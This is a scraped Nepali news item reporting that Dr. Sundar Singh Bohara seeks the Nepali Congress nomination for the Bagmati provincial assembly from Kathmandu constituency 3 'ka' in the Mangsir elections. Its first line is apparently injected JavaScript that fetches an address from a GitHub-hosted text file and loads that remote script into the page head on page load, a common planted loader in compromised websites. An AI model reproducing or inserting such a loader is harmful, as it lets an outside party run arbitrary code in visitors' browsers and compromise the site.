;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यून, काठमाडौँ।
मंसिर ४ गतेका लागि संघीय तथा प्रदेश निर्वाचन घोषणा भएसँगै उम्मेदवारीमा आकांक्षी राख्ने क्रम बढ्दै गएको छ । यसै क्रममा नेपाली काँग्रेस बागमति प्रदेश काठमाण्डो क्षेत्र न. ३ ‘क’ बाट चर्चामा रहेका आंकाक्षी डा. सुन्दर सिहं बोहराको प्रदेशसभा सदस्यमा दावी गरेका छन् | उनले काठमाडौँ क्षेत्र नं ३ प्रदेश “क” बाट आगामी मंसिरमा हुने निर्वाचनमा संसादमा दाबि भएको जुनेली न्यूनलाई बताएका छन् |
फेसबुक प्रतिक्रियाहरु